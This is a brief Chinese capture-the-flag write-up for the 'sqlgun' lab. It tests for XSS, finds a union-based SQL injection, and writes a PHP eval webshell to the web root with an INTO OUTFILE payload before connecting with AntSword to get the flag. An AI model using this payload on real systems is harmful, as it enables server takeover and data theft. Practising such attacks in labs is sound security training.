sqlgun靶场练习

1.打开网站看到有输入框,先测试以下有没有xss,能弹窗,说明存在xss漏洞

2.有xss大概率也存在sql注入,测试到3的时候发现有回显

3.进一步得出库名

4.要get shell的话我们可以尝试写一句话木马进去,构建payload

key=-1' union select 1,"<?php @eval($_POST[cmd]); ?>", 3 into outfile '/var/www/html/1.php'#

5.访问我们写进去的1.php,确认木马已写入

6.打开蚁剑连接

7.在根目录下得到flag

相关推荐
瘾大侠10 小时前
HTB - Kobold
网络·安全·web安全·网络安全
PyHaVolask10 小时前
SQL 注入实战:布尔盲注完整流程与 Python 脚本详解
web安全·渗透测试·sql注入·python脚本·布尔盲注
李白你好11 小时前
一个综合性的Web安全学习平台
学习·安全·web安全
聚铭网络12 小时前
聚铭网络参编!T/CCIA 005-2026《网络安全运营大模型参考架构》正式发布
网络·web安全·架构
暮色千里.53212 小时前
多因素认证中的漏洞
网络·安全·web安全
小二·13 小时前
企业级网络安全深度解析:从协议层到云原生的攻防实战与架构设计
安全·web安全·云原生
wanhengidc13 小时前
企业如何有效利用高防服务器
运维·服务器·网络·安全·web安全·智能手机
乐68214 小时前
CISCN2026半决赛wp
python·web安全·php
花纵酒14 小时前
kali:Sqlmap专题
web安全
介一安全14 小时前
【Web安全】HTTP请求走私与CL.TE漏洞从入门到实战
web安全·网络安全·安全性测试·http请求走私